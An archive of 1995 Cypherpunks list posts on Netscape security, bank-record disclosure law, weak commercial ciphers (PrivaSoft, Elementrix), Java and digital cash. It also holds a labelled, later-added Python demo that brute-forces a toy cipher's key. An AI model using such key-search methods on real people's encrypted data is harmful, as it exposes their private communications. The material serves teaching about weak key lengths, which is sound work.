Message-ID: <m0t6BcA-0006MAC@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>
>WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
>be secure - regardless of the user's use of their product.  Otherwise,
>the ads should read:
>
>	"Netscape can be used securely by sufficiently knowledgeable
>	users who have emasculated their postscript interpreters before
>	using them to view files of unknown origin, and who have removed
>	all other known, unknown, and/or undisclosed security holes from
>	their systems.  Otherwise, Netscape is insecure and should not be
>	trusted."
>
>-- 

Cars are claimed to be "safe". That only applies if driven sober, within speed
restrictions and road conditions by a (basically) trained driver.
The same analogy applies, in my view.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Oct 95 18:24:48 PDT
To: cypherpunks@toad.com
Subject: Lack of secrecy in U.S. Banks
Message-ID: <199510210107.SAA09911@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I ran across an interesting fragment of the U.S. Code.

Apparently, the Federal Government may access any banking records
whatsoever if the Director of the FBI (or the Director's designee)
certifies that the information is sought for "foreign intelligence
purposes."  Further, it is illegal for anybody to disclose that the
records were turned over to the government, or even sought.  I do not
know the penalties for disclosure.

The Attorney General appears to set guidelines for the dissemination
of the information obtained through this law.  Note that if banking
privacy is violated for reasons which are not related to
counter-intelligence operations, the victim is unlikely to be in a
position to seek relief from the courts because the privacy violation
is likely to remain secret.

I've enclosed the law below.  I'm not a lawyer, so it raises more
questions than it answers.  Perhaps the more skilled readers on the
list will be able to deduce the implications.

The U.S. Code is available at http://www.pls.com:8001/his/usc.html

This particular law is available at the improbable URL:
http://www.pls.com:8001/cgi-bin/taos_doc.pl?unix+0+uscode+17566+query+a+Government+authority+authorized+to+conduct+foreign+counter+%25BREAK%25+uscode%3a

Here is the law itself:

-CITE-

   12 USC Sec. 3414                                             01/24/94

-EXPCITE-

   TITLE 12 - BANKS AND BANKING
   CHAPTER 35 - RIGHT TO FINANCIAL PRIVACY

-HEAD-

   Sec. 3414. Special procedures

-STATUTE-

     (a)(1) Nothing in this chapter (except sections 3415, 3417, 3418,
   and 3421 of this title) shall apply to the production and
   disclosure of financial records pursuant to requests from -
       (A) a Government authority authorized to conduct foreign
     counter- or foreign positive-intelligence activities for purposes
     of conducting such activities; or
       (B) the Secret Service for the purpose of conducting its
     protective functions (18 U.S.C. 3056; 3 U.S.C. 202, Public Law
     90-331, as amended).
     (2) In the instances specified in paragraph (1), the Government
   authority shall submit to the financial institution the certificate
   required in section 3403(b) of this title signed by a supervisory
   official of a rank designated by the head of the Government
   authority.
     (3) No financial institution, or officer, employee, or agent of
   such institution, shall disclose to any person that a Government
   authority described in paragraph (1) has sought or obtained access
   to a customer's financial records.
     (4) The Government authority specified in paragraph (1) shall
   compile an annual tabulation of the occasions in which this section
   was used.
     (5)(A) Financial institutions, and officers, employees, and
   agents thereof, shall comply with a request for a customer's or
   entity's financial records made pursuant to this subsection by the
   Federal Bureau of Investigation when the Director of the Federal
   Bureau of Investigation (or the Director's designee) certifies in
   writing to the financial institution that such records are sought
   for foreign counterintelligence purposes and that there are
   specific and articulable facts giving reason to believe that the
   customer or entity whose records are sought is a foreign power or
   an agent of a foreign power as defined in section 1801 of title 50.
     (B) The Federal Bureau of Investigation may disseminate
   information obtained pursuant to this paragraph only as provided in
   guidelines approved by the Attorney General for foreign
   intelligence collection and foreign counterintelligence
   investigations conducted by the Federal Bureau of Investigation,
   and, with respect to dissemination to an agency of the United
   States, only if such information is clearly relevant to the
   authorized responsibilities of such agency.
     (C) On a semiannual basis the Attorney General shall fully inform
   the Permanent Select Committee on Intelligence of the House of
   Representatives and the Select Committee on Intelligence of the
   Senate concerning all requests made pursuant to this paragraph.
     (D) No financial institution, or officer, employee, or agent of
   such institution, shall disclose to any person that the Federal
   Bureau of Investigation has sought or obtained access to a
   customer's or entity's financial records under this paragraph.
     (b)(1) Nothing in this chapter shall prohibit a Government
   authority from obtaining financial records from a financial
   institution if the Government authority determines that delay in
   obtaining access to such records would create imminent danger of -
       (A) physical injury to any person;
       (B) serious property damage; or
       (C) flight to avoid prosecution.
     (2) In the instances specified in paragraph (1), the Government
   shall submit to the financial institution the certificate required
   in section 3403(b) of this title signed by a supervisory official
   of a rank designated by the head of the Government authority.
     (3) Within five days of obtaining access to financial records
   under this subsection, the Government authority shall file with the
   appropriate court a signed, sworn statement of a supervisory
   official of a rank designated by the head of the Government
   authority setting forth the grounds for the emergency access.  The
   Government authority shall thereafter comply with the notice
   provisions of section 3409(c) of this title.
     (4) The Government authority specified in paragraph (1) shall
   compile an annual tabulation of the occasions in which this section
   was used.

-SOURCE-

   (Pub. L. 95-630, title XI, Sec. 1114, Nov. 10, 1978, 92 Stat. 3707;
   Pub. L. 97-320, title IV, Sec. 432(b), Oct. 15, 1982, 96 Stat.
   1527; Pub. L. 99-569, title IV, Sec. 404, Oct. 27, 1986, 100 Stat.
   3197.)

-REFTEXT-

                            REFERENCES IN TEXT
     Public Law 90-331, as amended, referred to in subsec. (a)(1)(B),
   is Pub. L. 90-331, June 6, 1968, 82 Stat. 170, as amended, which is
   set out as a note under section 3056 of Title 18, Crimes and
   Criminal Procedure.

-MISC2-

                                AMENDMENTS
     1986 - Subsec. (a)(5). Pub. L. 99-569 added par. (5).
     1982 - Subsec. (b)(2). Pub. L. 97-320 struck out ''of'' after
   ''financial institution''.

-SECREF-

                  SECTION REFERRED TO IN OTHER SECTIONS
     This section is referred to in sections 3402, 3409, 3421 of this
   title.
  __________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 10:25:55 PDT
To: Steve <privsoft@ix.netcom.com>
Subject: Re: responce to graphic encryption replies
Message-ID: <Pine.3.89.9510201735.A11783-a100000-a100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


Urk.. not wanting to start up the "MIME is Evil, ASCII Forever !" thread
again, but it would help those of us who have to use MIME-supporting mail
programs if you didn't send messages as MIME attachments, pine is too
stupid to actually include the attachment in the reply... 

> How Secure Can PrivaSoft Be?

>  The typical policy is to limit the allowable cryptographic strength of
> commercial products to a level that is strong enough for commercial
> purposes. 

Sadly, that's not true. The typical policy is to limit the cryptographic
strength to a level that the NSA or a few hackers can break. IMHO 40-bit
RC4 doesn't come close to being strong enough for commercial purposes, at
least for anything other than trivial messages. 

> The cryptographic engine of PrivaSoft PrivaSoft uses a pseudo-random
> generator that is seeded by a 9 digit number uniformly normalized from
> the user's secret key. 

So that's about 30 bits ? Hmm, the computer on my desk kicked butt five
years ago, but today it's not much use for anything other than an
X-terminal, and slower than my $1500 laptop. Yet when we were cracking
SSL, it was searching a 28-bit chunk of keyspace every hour or so merely
using the idle cycles. In which case, if it's no harder to detect a
correct decryption than SSL, and no slower to decrypt than RC4, I could
crack your messages in about 4 hours by myself (of course, from what
you've said, it almost certainly *is* harder than that, the question is
*how much* harder).

Incidentally, how do you intend to distribute these secret keys ? Do you 
have some kind of RSA layer on top, or do I just have to call everyone I 
want to send faxes to and ask for their key ?

> The 9 digit key, when applied to analogue, the graphical encryption is

What do you mean here ? What's analogue in this system ? You're running 
it on digital data in a digital computer, right ?

> equivalent to a much longer key applied to alphanumeric encryption. 

Perhaps, but it would have to be at least 1000 times harder merely to 
make it as secure as RC4-40, which we've already shown to be insecure.

> PrivaSoft is unique in being a one-stop product than can serve all types
> of modern correspondence, including E-mail, fax and paper printouts. 
                                      ^^^^^^
This seems to be a direct contradiction of what you said above, unless you
plan to send email by creating a bitmap, encrypting the bitmap, and then 
sending that to the recipient. Some of us don't have T1 links to support 
that kind of mail... and it won't support, say, sending an executable 
file or C source code in that message and being able to use it at the 
other end.

It's also hardly unique, as PGP can readily encrypt any kind of digital 
data, with much better security.

	Mark


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 10:35:32 PDT
To: cypherpunks@toad.com
Subject: Re: responce to graphic encryption replies
Message-ID: <Pine.3.89.9510201855.A11783-c100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain

I said :

>  This message is in MIME format.  The first part should be readable text,
>  while the remaining parts are likely unreadable without MIME-aware tools.
 
AAaarrrgh !

> Urk.. not wanting to start up the "MIME is Evil, ASCII Forever !" thread
> again, but it would help those of us who have to use MIME-supporting mail
> programs if you didn't send messages as MIME attachments, pine is too
> stupid to actually include the attachment in the reply...

Thank you pine.. I guess it's time to add POP support to privtool so I 
can use a proper mailer...

	Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Fri, 20 Oct 95 10:56:21 PDT
To: privsoft@ix.netcom.com
Subject: Re: responce to graphic encryption replies
In-Reply-To: <199510191953.MAA29605@ix10.ix.netcom.com>
Message-ID: <199510201730.TAA00497@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit
> number uniformly normalized from the user's secret key.  The engine is
> proprietary, designed according to the rules of modern cryptology to
> make the best use of the allowable key length.

Uhhuh, 32 bit keys?  Now you have really convinced me that it is not
secure even against the neighbours' bright young kids.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 11:46:25 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510201903.A11783-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Oct 1995, Timothy C. May wrote:

> "You have a piece of mail awaiting at our mail delivery service. The
> originator is unknown. The title of the message is "Tentacles of Medusa
> Must Die!" You may retrieve this message by replying to this notification
> with the word "Yes" anywhere in the Subject field. This message will be
> kept for 60 days and then deleted."

I suspect that I could easily hack this into Mixmaster in a day or two,
but wouldn't it open you to attacks where Anonymous Fed, say, sends
terrorist kiddy-porn through your remailer and busts your ISP during those
60 days for possession ? I'm not sure if it would be better or worse than
current setups from that point of view. 

I might do it anyway, and set it up to only forward PGP-encrypted 
messages, but I certainly wouldn't be able to keep messages for 60 days 
with only a MB or so to spare.

	Mark

"Yes Judge, when we seized their computer we found 300 MB of *kiddy porn* 
and plans for *terrorist attacks* [that we'd mailed to them in the last two 
weeks...]"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 20 Oct 95 20:13:18 PDT
To: cypherpunks@toad.com
Subject: Challenge:  Hack Elementrix!
Message-ID: <199510210308.UAA07881@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




Everyone,

I think that with all the recent attention to Netscape and Microsoft that
another target has been altogether overlooked:  Elementrix POTP <spit>.
 
> New encryption method announced
> 
> Sept. 29 -- Elementrix Technologies has announced a breakthrough in data
> encryption that does away with the need for passwords and public/private
> keys, instead working transparently at either an application or hardware
> level. Using the One Time Pad method of encryption -- acknowledged for a
> long time as being a superior encryption method -- Elementrix has released
> both an FTP and E-Mail package that makes sending secure messages as easy
> as just clicking a button. Its Power One Time Pad (POTP) technology
> promises to ensure that in the very near future, the entire Internet can
> become a fundamentally secure place.

Elementrix is on the Web.  http://www.elementrix.co.il/

Reposted from sci.crypt:

In article <30803C0E.2781E494@unix.ka9q.ampr.org>, Phil Karn <karn@unix.ka9q.ampr.org> writes:
> This announcement pegs my bogometer (a device for measuring bogons,
> the elementary particle of bogosity).
> 
> Readers of the Skeptical Inquirer and other similar publications will
> recognize all the classic signs of a scam, either deliberate or
> self-delusionary:
> 
> 1. Breathless, overhyped language ("revolutionary", "breakthrough", etc)
> 
> 2. Clear misstatements of well-established theoretical principles
> (the discussion of the one-time pad)
> 
> 3. Reluctance to get specific, usually by citing proprietary concerns.
> When this is combined with a claim that a patent application has been
> filed, this is a clear sign of bogosity -- one's patent
> rights can be compromised only by publishing *before* filing, not after.
> 
> Unless, of course, the claim is rejected by the patent office,
> which is almost unheard of these days even for clearly bogus and/or
> trivial "inventions".
> 
> Phil

While Elementrix has failed to provide any detailed technical information
(specifications, source code, etc.) this is not entirely out of reach.

You can obtain an evaluation copy of their "secure" FTP client from
ftp://ftp.elementrix.co.il/pub/secftp/

This appears to be a binary for Microsoft Windoze.

The server at ftp.elementrix.co.il is a "secure" server.  Note:

    ftp> open ftp.elementrix.co.il
    Connected to ftp.elementrix.co.il.
    220 sunex FTP server [Elementrix POTP(1.51) Secure FTP(1.5-3)] ready.
    Name (ftp.elementrix.co.il:dwa): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> close
    221 Goodbye.
    ftp>

So there you go.

Sure, commented source code with accompanying specifications for an
implementation are nice, but did Ian and David have such luxuries for
their Netscape hack?

I will confess that I have not actually tried running their software,
let alone reverse-engineering it, as I am Windoze-challenged (running
on SunOS 4.1.x as we speak).  However, I'm sure there are probably many
people on this list with suitable Windoze platforms complete with the
necessary reverse engineering tools.

In many ways, Elementrix is a more enjoyable target.  Their claims of
security reek of more marketing hype than even Microsoft would stoop to,
and their use of the term "One Time Pad" is disgusting.  At least Netscape
is trying to use respectable crypto algorithms and is being open about
their code.  These people deserve to be flamed far more than Netscape (and
even Microsoft) ever did.

Perhaps someone could even convince Sameer to do T-shirts.  I'll even
agree to cover the cost of one for the first exploit.  How about it,
Sameer? :)


Dana W. Albrecht
dwa@corsair.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 20 Oct 95 17:52:09 PDT
To: owner-cypherpunks@toad.com
Subject: Re: textbooks
Message-ID: <9510210049.AA18758@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I have also heard good things about a book by Warwick Ford.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 13:46:37 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510202106.A11783-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995, Timothy C. May wrote:

> Drives are cheap. I just saw a 1.2 GB for $195 (internal, PC). I suspect
> that anyone sweating over having only a MB to spare shouldn't be running a
> remailer.

The trouble is, I can't just add a 1.2 GB disk to my ISP and use it, I 
have to pay monthly for more space. In addition, it would be time-limited 
to three months or so in any case, as I'm going to be travelling and 
wouldn't be able to support it.

> (Not a slam against Mark, just a statement that there are certain minimal
> capabilities I'd expect to see, and not having free disk space is a serious
> problem.)

Yeah, I was mostly intending it to be a proof-of-concept, not really as an
operational remailer at this point. If it was available as a patch for
Mixmaster, say, then anyone who wanted to run such a remailer and had the
disk space available, would be able to do so. 

BTW, how would the ECPA apply to, say, bouncing non-PGP messages ? From 
the sound of it, doing that would be worse from a legal standpoint than 
not doing it, as it would imply I was censoring the mailfeed in some 
fashion.

	Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SysAdmin <admin@dcwill.com>
Date: Fri, 20 Oct 95 21:46:37 PDT
To: cypherpunks@toad.com
Subject: Re: textbooks
In-Reply-To: <9510210049.AA18758@sulphur.osf.org>
Message-ID: <199510210446.VAA22741@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain


'Rich Salz' wrote:
 
> I have also heard good things about a book by Warwick Ford.

Along the same lines, I just picked up "Cryptography, Theory and 
Practice" by Douglas R. Stinson (CRC Press, 1995). It seems to be 
very comprehensive but lacks the readability of Schneier. This is 
definitely not a beginner's book, but it would be useful to someone 
seeking greater insight into the math behind crypto.


Fred  <admin@dcwill.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 20 Oct 95 21:56:18 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Java good for security? (was: 50 ways...)
In-Reply-To: <199510201919.PAA20537@clark.net>
Message-ID: <Pine.SOL.3.91.951020212519.14955B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Earlier on, when the Java threads started, I posted several responses to 
a post like this explaining why java theoretically protects against 
attacks like the ones mentioned, and suggested what parts of the code 
need to be examined/attacked to violate the security assumptions. 
Everybody here knows what you can do if you can execute any code you 
want; to show a breach you must show that the code you want can be executed.

Although I wouldn't put money on the current implementation of the Java 
VM being 100% perfect, I am pretty confident that a fully trusted VM can be 
built (the instruction set and type verifiers are very simple and 
conservative). Adding in the garbage collector and the thread system may 
make things more complicated, but hopefully these factors won't make 
things too bad. 

Once you have a trusted VM and core runtime, all you need to do is add 
once the run-time classes you need and are able to verify to your desired 
level of trust, and you have a reasonably trusted language to write your 
programs in. This, and several other features of java should make it 
easier to write trusted code.

	1) Exceptions. Java has exceptions, and like CLU on prozac, nags 
	   you if you don't explicitly catch or pass thru them. Errors 
	   which are ignored are a very common cause of security holes.
	2) Bounds checked arrays. Can't overflow, making the world safe 
	   for stack frames everywhere.
	3) Garbage collection - no leaks, and no use of freed memory.
	4) Real access protection  for private members - easier to make sure
	   info isn't leaking if all access is mediated through a single unit.
	
Hmmm. What other features would be good for writing trusted code like 
network servers? Anyone got any cites on language issues and security? 
That don't involve ADA :-)?

Simon


----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 20 Oct 95 19:09:58 PDT
To: Holger Reif <Holger.Reif@PrakInf.TU-Ilmenau.DE>
Subject: Re: digital cash and identity disclosure
In-Reply-To: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
Message-ID: <Pine.SUN.3.91.951020220855.25323J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


i would like to propose the following radical idea:  Chaumian digicash is 
a nice curiosity.  The future in the medium term (10+ years) for better 
or worse belongs to Mondex.

Comments?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Fri, 20 Oct 95 22:26:53 PDT
To: "'cypherpunks@toad.com>
Subject: M$ Windows 95 swap files, disk recovery & PGP
Message-ID: <01BA9F3B.A68179E0@king1-16.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Hi there, 
I read about this list in the Electronic Engineering Times, so I scored PGP as soon as I could.
My ?? is this: When I create a document on M$ Word or XL and then PGP it, how could I eliminate the plaintext left in the swap file?  Now, I understand the PGP -w command but that only wipes the original
plaintext. 
	My other ?? is if my disk is seized by the S.S. , how easy would it be for  them to recover
old plaintext messages? 
	Thanks,
	Eric



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 20 Oct 95 21:01:16 PDT
To: privsoft@ix.netcom.com
Subject: Re: [reformatted] how secure can privasoft be?
In-Reply-To: <199510202040.QAA29119@light.lightlink.com>
Message-ID: <199510210401.AAA16706@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> PrivaSoft has obtained an export license from the governments of Israel and 
> the USA.  
[...]
> PrivaSoft willfully complies with these regulations as it is a commercial 
> product, and it is not intended for national security applications with its 
> current key length which is the maximum legally allowable for commercial 
> users.
> 
> The cryptographic engine of PrivaSoft
> 
> PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number 
> uniformly normalized from the user's secret key.  The engine is proprietary, 
> designed according to the rules of modern cryptology to make the best use of 
> the allowable key length.

This seems paradoxical. PrivaSoft uses a key approximately 30 bits long. It
is claimed that the key length "is the maximum legally allowable for 
commercial users". How does this square with (to pick a familiar example) the
40 bit RC4 keys used in the exportable international version of Netscape 
Navigator ?

Two possible explanations I can imagine are:

(0) PrivaSoft actually uses a key longer than 9 digits, and someone just made
    a mistake somewhere along the line. Perhaps it's really 9 extended-ASCII
    characters == 9 bytes == 72 bits, rather than 9 digits == 
    ceil(9*lg(10)) bits == 30 bits.

(1) NSA believes it is about (2^40)/(2^30) == 1024 times harder to break
    the PrivaSoft scheme than SSL with 40-bit RC4. That would be remarkable.

[...]
> The use of default keys
> 
> When secret keys or passwords are used by laymen, there is always a conflict 
> between security and convenience:  The user tends to use fixed, easily 
> memorized keys again and again, while the cryptoanalyst only waits for an 
> opportunity to see many messages encrypted by the same key.  

I get the feeling you are confusing two separate issues here. Users do tend 
to use easily memorized passphrases, which is indeed a problem, because such
passphrases are in general easy to guess. But cryptosystems are generally
meant to resist attacks based on the cryptanalyst gaining access to many 
ciphertexts, even if all were encrypted with a single key.

[...]
> A simple example:  For a short message, increasing the font 
> size of the text by a factor of 10 will significantly increase the time 
> required for breaking the encryption.

Anyone know how to get 120 point text in LaTeX ?

> Customized versions of PrivaSoft
> 
> PrivaSoft is unique in being a one-stop product than can serve all types of 
> modern correspondence, including E-mail, fax and paper printouts.  Special 
> applications that need and can obtain a license to use non-commercial 
> cryptographic engines can be accommodated by special versions of PrivaSoft.  
> The cryptographic engine can be customer-furnished and customer integrated, 
> however - since in some areas the integration of this product with certain 
> cryptographic engines may be considered "munitions", each customized version 
> of the product has to be licensed separately in accordance with the laws of 
> the territory where it was created and used.

I think this is a smart idea.

-Futplex <futplex@pseudonym.com>
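
Added example (not part of the original thread, and not PrivaSoft's engine, which the posts say is undisclosed): a sketch of the key-length argument in the replies above, showing that neighbouring-pixel agreement is enough to recognise a correct decryption of a noisy image. Assumptions: a stand-in cipher (Python's `random.Random` stream XORed over a constructed 32x32 bitmap), a key space cut to 3 digits so it runs in seconds, and the 2^28 keys per hour rate taken from Mark Grant's post.

```python
import math
import random

W, H = 32, 32                      # constructed 1-bit "fax page", one int per row
ROW_MASK = (1 << W) - 1


def key_bits(alphabet_size, length):
    """Bits of key material in `length` symbols drawn from `alphabet_size`."""
    return math.ceil(length * math.log2(alphabet_size))


def hours_to_exhaust(keys, keys_per_hour):
    """Worst-case hours to try every key at a given search rate."""
    return keys / keys_per_hour


def make_page(noise=0.05, noise_seed=1995):
    """Constructed sample input: thick horizontal bars plus ~5% flipped pixels."""
    rng = random.Random(noise_seed)
    rows = []
    for y in range(H):
        row = 0
        for x in range(W):
            ink = (y // 4) % 2 == 0 and 4 <= x < 28
            if rng.random() < noise:   # fax-style noise
                ink = not ink
            row |= int(ink) << x
        rows.append(row)
    return rows


def xor_page(rows, key):
    """Stand-in cipher (assumption): XOR with a PRNG stream seeded by the key.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    stream = random.Random(key).getrandbits(W * H)
    return [r ^ ((stream >> (y * W)) & ROW_MASK) for y, r in enumerate(rows)]


def smoothness(rows):
    """Fraction of horizontally adjacent pixel pairs that agree.
    Real pages score high; output from a wrong key scores near 0.5."""
    pair_mask = (1 << (W - 1)) - 1     # drop the pair that would cross a row edge
    differing = sum(bin((r ^ (r >> 1)) & pair_mask).count("1") for r in rows)
    return 1 - differing / (H * (W - 1))


def recover_key(cipher_rows, digits):
    """Try every decimal key; keep the one whose output looks most like a page."""
    best = max(range(10 ** digits),
               key=lambda k: smoothness(xor_page(cipher_rows, k)))
    return best, smoothness(xor_page(cipher_rows, best))


SECRET_KEY = 417                       # constructed 3-digit key for the demo
CIPHERTEXT = xor_page(make_page(), SECRET_KEY)

if __name__ == "__main__":
    print("9 decimal digits :", key_bits(10, 9), "bits")
    print("9 bytes          :", key_bits(256, 9), "bits")
    print("40-bit vs 9-digit:", 2 ** 40 // 2 ** 30, "times more keys")
    key, score = recover_key(CIPHERTEXT, 3)
    print("recovered key    :", key, "smoothness %.2f" % score)
    print("10^9 keys at 2^28 keys/hour: %.1f hours"
          % hours_to_exhaust(10 ** 9, 2 ** 28))
```

The per-key cost of the recognition test is a few hundred bit operations on this bitmap, so it scales the search time by a constant factor rather than adding bits to the key.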



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Sat, 21 Oct 95 00:13:19 PDT
Subject: No Subject
Message-ID: <9510210713.AA03694@toad.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 00:06:43 PDT
To: cypherpunks@toad.com
Subject: Article on Digital Cash in "Worth"
Message-ID: <acade6614d0210045f23@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I don't recall seeing mention of this, so here goes.

The October 1995 issue of "Worth" magazine has a fairly long article about
digital cash in several forms, and about David Chaum's Digicash in
particular. It has a more detailed description of his Amsterdam operation,
and his history, than I recall seeing anywhere else.

While I'm on the subject of Chaum and Digicash, several recent posts here
have commented about my dislike of Digicash's current approach, or about my
criticisms of the current approach. Given the recent "piling on" aimed at
Netscape (for various reasons I think are obvious--see Note), I don't want
to be perceived as one of Digicash's leading critics.

The fact is, I'm not in the business of trying to deploy any kind of
digital cash, so I don't follow too closely the ins and outs of what
various "digital money" systems are currently offering. I have some
long-range interests in the societal implications of truly anonymous
digital cash, and argue the issues frequently, but I avoid worrying
overmuch about Mondex vs. First Virtual vs. QuickenCash vs. whatever.

Note: About half of all posts to the CP list for the past several weeks
have somehow involved Netscape. The attacks on Netscape have been
impressive, but many of the posts have a "me too" flavor, sort of the way
my smaller cat takes every opportunity to nip at my larger cat when the
larger cat is in distress. The phrase "kicking them when they're down"
comes to mind. Not that the issues aren't real, just that a lot of folks
want to be the "next Goldberg and Wagners," or that they want to add their
two cents about how Netscape is blowing it.

I stay out of this, but I certainly don't want to see Digicash given the
same treatment. Their current product may not be all that some of us desire
(in terms of anonymity, for example), but it sure does beat the
alternatives in essential ways.

I don't want to see Netscape so trashed that people turn to lesser-tested
alternatives without good reason (Microsoft Network being one example), and
I don't want to see Digicash so trashed that people turn to some product
like Mondex.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 20 Oct 95 21:23:58 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java power
In-Reply-To: <199510192201.PAA14221@kiwi.cs.berkeley.edu>
Message-ID: <199510210424.AAA17318@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[in retrospect, not much direct crypto relevance in my reply]

Raph Levien writes:
>    Another scenario which works is email, even including transparent
> encryption. This one is interesting to me, so I'll go into a little
> more detail.
>    In this scenario, the server acts as a file server for keyrings
> (both public and secret) and mail spools. Here's a typical sequence of
> events for me getting my mail and replying to one message:
> 
> 1. I call up the JavaMail web page, which is just a wrapper for the
> JavaMail applet.
> 
> 2. The JavaMail applet starts with a forms-style login screen. I type
> my username.
> 
> 3. The applet asks the server for my mail spool (given the username
> and perhaps also a password for authentication).
> 
> 4. The applet displays my mail spool on the screen and lets me fiddle
> with it, scrolling through it, reading messages, etc.
[...steps 5-10 elided...]
>    To me, this is an exciting scenario. Note that, as long as you
> trust the browser, this lets you read your mail from anywhere.

I'm trying to mentally compare this scenario with the use of a 
cryptographically-outfitted mailer operated through an encrypted telnet 
session. 

First of all, I suppose the browser has groovy bells and whistles to spice
up reading email. Maybe you could run a snazzy GUI standalone mailer in some
windowing protocol through the encrypted telnet link as an alternative. This 
is largely irrelevant to me personally, but could make a huge difference to 
the hoi polloi.

Ignoring such interface concerns, what kinds of situations would be conducive
to the JavaMail approach but not, say, ssh+Elm+PGP ?  Perhaps I'm visiting
someone where there's no local POP for my ISP. The friend I'm visiting has 
e.g. an AOL account. I would like to read mail on my remote account via her
AOL browser. Am I wrong in assuming that I couldn't execute a telnet: URL
with the AOL browser ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@yak.net>
Date: Mon, 23 Oct 95 13:40:44 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
In-Reply-To: <199510172323.QAA27433@comsec.com>
Message-ID: <199510210110.BAA00135@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text


> So, send me your examples. Supply as much detail as you can, including
> company names if possible. I'll accept "unnamed sources" if they are
> _primary_ sources, but no "friend of a friend told me that...," unless the
> details look very convincing.


Tim, a friend comments that if you're serious about getting
reports this way, you should contact one of the human rights
groups (Amnesty International, Article 19...) that gathers
reports which are generally believed to be accurate under
much more threatening situations.

I thought it a good comment.  I've worked for amnesty before,
and know of their reputation, but not how they attained it...

	strick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Fri, 20 Oct 95 19:32:20 PDT
To: cypherpunks@toad.com
Subject: faxes are not secure
